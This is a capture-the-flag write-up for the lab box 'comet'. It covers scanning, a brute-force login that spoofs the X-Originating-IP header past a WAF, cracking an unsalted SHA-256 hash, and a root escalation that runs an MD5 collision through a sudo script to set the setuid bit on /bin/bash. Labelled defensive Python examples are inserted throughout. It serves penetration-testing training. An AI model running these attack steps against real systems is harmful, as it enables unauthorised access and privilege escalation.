【OSCP】comet

admin, 2024-04-12 12:42:14, 6 views, 6047 characters, 20 min 9 s read

Box overview

Box: comet

Difficulty: medium

Topics: WAF, X-Originating-IP bypass, Burp Suite brute force, SHA-256 hash, john cracking

Information gathering

Host discovery

Port scanning

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.104
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-07 03:36 EST
Nmap scan report for 192.168.1.104
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)
| 256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)
|_ 256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)
80/tcp filtered http
MAC Address: 08:00:27:2A:46:9B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds

Directory scanning

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.104 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.104/.php (Status: 403) [Size: 278]
http://192.168.1.104/.html (Status: 403) [Size: 278]
http://192.168.1.104/images (Status: 301) [Size: 315] [--> http://192.168.1.104/images/]
http://192.168.1.104/contact.html (Status: 200) [Size: 5886]
http://192.168.1.104/blog.html (Status: 200) [Size: 8242]
http://192.168.1.104/about.html (Status: 200) [Size: 7024]
http://192.168.1.104/login.php (Status: 200) [Size: 1443]
http://192.168.1.104/support.html (Status: 200) [Size: 6329]
http://192.168.1.104/index.html (Status: 200) [Size: 7097]
http://192.168.1.104/ip.txt (Status: 200) [Size: 0]
http://192.168.1.104/js (Status: 301) [Size: 311] [--> http://192.168.1.104/js/]
http://192.168.1.104/.html (Status: 403) [Size: 278]
http://192.168.1.104/.php (Status: 403) [Size: 278]
http://192.168.1.104/server-status (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)

The directory scan turned up the admin login page (login.php) and two usernames.

There also seems to be a WAF in front of the login: a request with a single quote added just spins forever, and brute forcing fails as well.

Testing showed that adding an X-Originating-IP header bypasses the WAF; with the header added, a Burp Suite brute force recovered the login username and password.

If Burp hangs while importing the wordlist, hydra can do the brute force instead:

└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.104 http-post-form "/login.php:username=admin&password=^PASS^:H=X-ORIGINATING-IP:test:F=Invalid"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-09 21:05:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.1.104:80/login.php:username=admin&password=^PASS^:H=X-ORIGINATING-IP:test:F=Invalid
[STATUS] 4427.00 tries/min, 4427 tries in 00:01h, 14339972 to do in 53:60h, 16 active
[80][http-post-form] host: 192.168.1.104 login: admin password: solitario
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
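The root cause on this box is that the WAF takes a client-supplied X-Originating-IP header as the request's source address, so every login attempt can claim to come from a fresh client and per-IP throttling never triggers. The following is an added example (not code from the original write-up or from the box) contrasting the weak way of deriving a client IP with a hardened one that only honours forwarded headers from a known proxy, and a login rate limiter keyed on the resolved address. TRUSTED_PROXIES, the sample addresses and the simulated attempt count are constructed.

```python
import ipaddress
from collections import defaultdict, deque

# Constructed: the reverse proxies we operate. Only a TCP peer in this set may
# tell the application who the real client is; anyone else's header is noise.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

# Headers that carry a client-asserted address; X-Originating-IP is the one this box honours.
FORWARD_HEADERS = ("X-Originating-IP", "X-Forwarded-For", "X-Real-IP", "Client-IP")


def client_ip_naive(remote_addr, headers):
    """Weak pattern (what the box's WAF effectively does): believe any forwarded
    header the client sends, so the source address is attacker-chosen."""
    for name in FORWARD_HEADERS:
        value = headers.get(name)
        if value:
            return value.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr, headers):
    """Honour X-Forwarded-For only when the TCP peer is one of our proxies, and
    then take the entry our proxy appended (the right-most), never the left-most
    one the client could have written itself."""
    if ipaddress.ip_address(remote_addr) not in TRUSTED_PROXIES:
        return remote_addr
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    return hops[-1] if hops else remote_addr


class LoginRateLimiter:
    """Sliding-window limit on failed logins, keyed by the resolved client IP."""

    def __init__(self, max_failures=5, window_s=60, resolver=client_ip_hardened):
        self.max_failures = max_failures
        self.window_s = window_s
        self.resolve = resolver
        self.failures = defaultdict(deque)   # ip -> timestamps of recent failures

    def allow(self, remote_addr, headers, now):
        ip = self.resolve(remote_addr, headers)
        q = self.failures[ip]
        while q and now - q[0] > self.window_s:
            q.popleft()                      # drop failures outside the window
        return len(q) < self.max_failures

    def record_failure(self, remote_addr, headers, now):
        self.failures[self.resolve(remote_addr, headers)].append(now)


def simulate_spoofed_bruteforce(limiter, attempts, peer="198.51.100.7"):
    """Constructed scenario: one peer sends `attempts` failed logins one second
    apart, each carrying a different X-Originating-IP. Returns how many the
    limiter let through."""
    passed = 0
    for i in range(attempts):
        headers = {"X-Originating-IP": f"203.0.113.{i % 250 + 1}"}
        now = float(i)
        if limiter.allow(peer, headers, now):
            passed += 1
            limiter.record_failure(peer, headers, now)
    return passed


if __name__ == "__main__":
    print("naive resolver let through:",
          simulate_spoofed_bruteforce(LoginRateLimiter(resolver=client_ip_naive), 20))
    print("hardened resolver let through:",
          simulate_spoofed_bruteforce(LoginRateLimiter(resolver=client_ip_hardened), 20))
```

With the naive resolver all 20 spoofed attempts pass because each one lands in a fresh bucket; with the hardened resolver the limiter sees the single TCP peer and blocks everything after the fifth failure. The same rule applies to allow-lists and WAF exemptions: a header only means something when the hop that set it is one you control.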

After logging in to the admin panel with these credentials, it contains some firewall log files and a firewall update program.

firewall_update asks for a password when launched; dumping its strings with strings reveals a SHA-256 hash.

echo "b8728ab81a3c3391f5f63f39da72ee89f43f9a9f429bc8cfe858f8048eaad2b1" > hash256

Use john to crack the SHA-256 hash.

Or crack it directly on an online hash lookup site.

The password is correct, but it has no effect at all.
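The reason john (or a lookup site) gets this password back in seconds is that firewall_update compares against a single unsalted SHA-256 digest embedded in the binary: one fast hash per guess, and the same digest for everyone who picked that password. The block below is an added example, not code from the write-up or from the box, reproducing that weakness next to a salted scrypt scheme that removes it. CANDIDATES is a constructed stand-in for rockyou.txt and the passwords are made up; the real hash from the binary is not used.

```python
import hashlib
import hmac
import os

# Constructed stand-in for rockyou.txt (the real list has ~14 million entries).
CANDIDATES = ["123456", "password", "letmein", "comet2024", "firewall!", "qwerty"]

# Memory-hard parameters; n=2**14, r=8 needs about 16 MiB per hash.
SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32, maxmem=64 * 1024 * 1024)


def sha256_unsalted(password):
    """The scheme found in firewall_update: one fast, unsalted hash of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def recover_unsalted(target_hex, candidates):
    """Offline guessing against an unsalted fast hash: one SHA-256 per guess.
    With no salt the work is precomputable and shared across every binary that
    embeds the same password, which is why a wordlist run is enough."""
    for word in candidates:
        if hmac.compare_digest(sha256_unsalted(word), target_hex):
            return word
    return None


def scrypt_store(password, salt=None):
    """Salted, memory-hard hash stored as salt.hex()$digest.hex(). A fresh random
    salt per password defeats precomputation; scrypt's cost taxes every guess."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return f"{salt.hex()}${digest.hex()}"


def scrypt_verify(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    target = sha256_unsalted("comet2024")        # constructed target digest
    print("unsalted sha256 recovered:", recover_unsalted(target, CANDIDATES))
    stored = scrypt_store("comet2024")
    print("scrypt verify correct:", scrypt_verify("comet2024", stored))
    print("scrypt verify wrong:  ", scrypt_verify("comet2025", stored))
```

The salted form also has the property that two installations choosing the same password store different values, so a digest lifted from one binary tells you nothing about another. Embedding any password check in a client-side binary remains weak regardless of the hash, since the check itself can be patched out; the hash choice only decides how quickly the secret is recovered.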

Download the logFire log files, then grep through them to find the username:

wget -r http://10.0.2.35/logFire/

Gaining access

ssh [email protected]

Privilege escalation

In joe's home directory there is a file called coll; checking sudo -l shows it can be run with root privileges.

We can run /bin/bash /home/joe/coll as root. Let's take a look at the coll file:

#!/bin/bash
exec 2>/dev/null                         # discard all error output

file1=/home/joe/file1
file2=/home/joe/file2
md5_1=$(md5sum $file1 | awk '{print $1}')
md5_2=$(md5sum $file2 | awk '{print $1}')

if [[ $(head -n 1 $file1) == "HMV" ]] &&
   [[ $(head -n 1 $file2) == "HMV" ]] &&
   [[ $md5_1 == $md5_2 ]] &&
   [[ $(diff -q $file1 $file2) ]]; then  # diff -q prints only when the files differ
    chmod +s /bin/bash
    exit 0
else
    exit 1
fi

The script checks that the first line of both files is the text HMV; if the two files then have the same MD5 hash while still differing in content (diff -q reports a difference), it sets the setuid bit on the bash interpreter.

Download md5collgen, create a file containing HMV, and run md5collgen with file1 as the prefix to produce the colliding pair msg1.bin and msg2.bin; then rename them to file1 and file2. Finally run sudo /bin/bash /home/joe/coll, after which bash carries the SUID bit. Running bash -p escalates to root.

joe@comet:~$ wget http://192.168.1.158:12345/md5collgen
--2024-01-10 05:33:00-- http://192.168.1.158:12345/md5collgen
Connecting to 192.168.1.158:12345... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3338360 (3.2M)
Saving to: ‘md5collgen’

md5collgen 100%[=================================================>] 3.18M --.-KB/s in 0.1s

2024-01-10 05:33:00 (31.3 MB/s) - ‘md5collgen’ saved [3338360/3338360]

joe@comet:~$ echo HMV > file1
joe@comet:~$ ls
coll file1 md5collgen user.txt
joe@comet:~$ chmod +x md5collgen
joe@comet:~$ ls
coll file1 md5collgen user.txt
joe@comet:~$ ./md5collgen file1
MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Using output filenames: 'msg1.bin' and 'msg2.bin'
Using prefixfile: 'file1'
Using initial value: 66fdfd128fcadfc4946a54c7a85dc86d

Generating first block: ..ls
.................................................................................................................
Generating second block: W...........................................
Running time: 122.733 s
joe@comet:~$ ls
coll file1 md5collgen msg1.bin msg2.bin user.txt
joe@comet:~$ ls
coll file1 md5collgen msg1.bin msg2.bin user.txt
joe@comet:~$ rm file1
joe@comet:~$ mv msg1.bin file1
joe@comet:~$ mv msg2.bin file2
joe@comet:~$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
joe@comet:~$ sudo /bin/bash /home/joe/coll
joe@comet:~$ bash -p
bash-5.1# id
uid=1000(joe) gid=1000(joe) euid=0(root) egid=0(root) groups=0(root),1000(joe)
bash-5.1# whoami
root
bash-5.1# ls
coll file1 file2 md5collgen user.txt
bash-5.1# cd /root
bash-5.1# ls
root.txt
bash-5.1# cat root.txt
052cf26a6e7e33790391c0d869e2e40c
bash-5.1#
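Added example, not part of the write-up or of the box: a Python port of coll's four conditions that makes explicit why the only input reaching the grant branch is an MD5 collision sharing the HMV prefix (which is exactly what md5collgen produced above), plus the audit a defender runs afterwards, looking for the setuid bit that chmod +s /bin/bash leaves behind and that shows up in the bash -p session as euid=0 next to uid=1000. The file contents in the scenarios are constructed; none of them collide, so the grant branch is only reachable with real colliding files such as md5collgen's msg1.bin and msg2.bin.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def first_line(path):
    """Equivalent of $(head -n 1 file): the first line without its newline."""
    with open(path, "rb") as f:
        return f.readline().rstrip(b"\n")


def coll_decision(file1, file2, algo="md5"):
    """Port of the four conditions in /home/joe/coll. Returns (grant, reason).

    The last two conditions together demand equal digests but different bytes,
    so with algo="md5" the only satisfying input is an MD5 collision that starts
    with "HMV"; with a collision-resistant algo the grant branch is unreachable
    in practice.
    """
    if first_line(file1) != b"HMV" or first_line(file2) != b"HMV":
        return False, "first line is not HMV"
    data1, data2 = Path(file1).read_bytes(), Path(file2).read_bytes()
    if hashlib.new(algo, data1).hexdigest() != hashlib.new(algo, data2).hexdigest():
        return False, f"{algo} digests differ"
    # [[ $(diff -q f1 f2) ]] is true only when diff prints something,
    # i.e. only when the files are NOT identical.
    if data1 == data2:
        return False, "files are byte-identical"
    return True, f"equal {algo} digest, different bytes: collision"


def scenario(content1, content2, algo="md5"):
    """Write two constructed files to a temp dir and run the check on them."""
    with tempfile.TemporaryDirectory() as d:
        f1, f2 = os.path.join(d, "file1"), os.path.join(d, "file2")
        Path(f1).write_bytes(content1)
        Path(f2).write_bytes(content2)
        return coll_decision(f1, f2, algo)


# ---- post-exploitation audit: which interpreters carry setuid/setgid? ----

# Assumed set of interpreter paths to check; extend for the host in question.
INTERPRETERS = ["/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/python3", "/usr/bin/perl"]


def privilege_bits(mode):
    """Name the setuid/setgid bits present in an st_mode value."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("setuid")
    if mode & stat.S_ISGID:
        bits.append("setgid")
    return bits


def audit_interpreters(paths=INTERPRETERS):
    """Map each existing interpreter to its privilege bits. An entry such as
    {'/bin/bash': ['setuid']} is the artifact this escalation leaves behind,
    matching the -rwsr-xr-x mode chmod +s produces."""
    findings = {}
    for p in paths:
        try:
            mode = os.stat(p).st_mode
        except FileNotFoundError:
            continue
        bits = privilege_bits(mode)
        if bits:
            findings[p] = bits
    return findings


if __name__ == "__main__":
    print(scenario(b"HMV\n", b"HMV\n"))                   # identical: diff prints nothing
    print(scenario(b"HMV\nalpha\n", b"HMV\nbeta\n"))      # different: MD5 differs
    print(audit_interpreters())
```

Running scenario() against the actual file1/file2 produced by the procedure above returns (True, ...) with the default md5 and (False, "sha256 digests differ") with algo="sha256", which is the whole lesson of this box: an equal MD5 is not evidence that two inputs are the same. The audit function is cheap enough to schedule; a shell gaining the setuid bit is not something a package upgrade does, so any hit is worth an alert.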

End

Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】comet

Please keep this link when reposting (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/2650529.html
